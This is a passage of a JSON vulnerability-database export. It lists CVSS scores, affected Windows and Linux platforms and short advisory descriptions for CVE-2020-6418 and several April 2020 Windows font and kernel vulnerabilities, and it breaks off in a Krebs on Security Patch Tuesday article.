"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-07-30T00:00:00", "id": "AKB:F1FF517B-6FF7-4972-9CA6-6F009CD86E66", "href": "https://attackerkb.com/topics/lMn6eEE22f/cve-2020-6418", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-20T20:12:53", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka \u2018Windows Kernel Elevation of Privilege Vulnerability\u2019. This CVE ID is unique from CVE-2020-0913, CVE-2020-1000, CVE-2020-1003.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 2:27am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. 
Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-1027", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0913", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1027"], "modified": "2020-07-24T00:00:00", "id": "AKB:D1AE859F-1644-40D4-9203-7D8D97ABBB49", "href": "https://attackerkb.com/topics/y0GBp0P90z/cve-2020-1027", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:47:38", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code 
Execution Vulnerability'. This CVE ID is unique from CVE-2020-1020.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-0938", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-0938", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0938", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2022-07-13T16:00:28", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code Execution Vulnerability'. 
This CVE ID is unique from CVE-2020-0938.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-1020", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2020-1020", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1020", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-31T19:21:07", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T23:15:00", "type": "cve", "title": "CVE-2020-6418", "cwe": 
["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2022-03-31T17:12:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:fedoraproject:fedora:31", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:30", "cpe:/o:redhat:enterprise_linux_workstation:6.0"], "id": "CVE-2020-6418", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:47:09", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. 
This CVE ID is unique from CVE-2020-1000, CVE-2020-1003, CVE-2020-1027.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-0913", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0913", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1027"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-0913", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0913", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:49:31", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0913, CVE-2020-1000, CVE-2020-1027.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-1003", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0913", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1027"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", 
"cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-1003", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1003", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:48:58", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. 
This CVE ID is unique from CVE-2020-0913, CVE-2020-1003, CVE-2020-1027.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-1000", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0913", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1027"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2020-1000", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1000", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, 
"cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-09-30T17:06:46", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. 
This CVE ID is unique from CVE-2020-0913, CVE-2020-1000, CVE-2020-1003.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-1027", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0913", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1027"], "modified": "2022-09-30T13:30:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1809"], "id": "CVE-2020-1027", 
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1027", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*"]}], "krebs": [{"lastseen": "2020-04-18T09:42:02", "description": "**Microsoft** today released updates to fix 113 security vulnerabilities in its various **Windows** operating systems and related software. 
Those include at least three flaws that are actively being exploited, as well as two others which were publicly detailed prior to today, potentially giving attackers a head start in figuring out how to exploit the bugs.\n\nNineteen of the weaknesses fixed on this Patch Tuesday were assigned Microsoft's most-dire \u201ccritical\u201d rating, meaning malware or miscreants could exploit them to gain complete, remote control over vulnerable computers without any help from users.\n\nNear the top of the heap is [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), a remotely exploitable bug in the **Adobe Font Manager** library that was first detailed in late March when Microsoft said it had seen the flaw being used in active attacks.\n\nThe Adobe Font Manager library is the source of yet another zero-day flaw -- [CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>) -- although experts at security vendor **Tenable** say there is currently no confirmation that the two are related to the same set of in-the-wild attacks. Both flaws could be exploited by getting a Windows user to open a booby-trapped document or view one in the Windows Preview Pane.\n\nThe other zero-day flaw ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) affects **Windows 7** and **Windows 10 systems**, and earned a slightly less dire \"important\" rating from Microsoft because it's an \"elevation of privilege\" bug that requires the attacker to be locally authenticated.\n\nMany security news sites are reporting that Microsoft addressed a total of four zero-day flaws this month, but it appears the advisory for a critical Internet 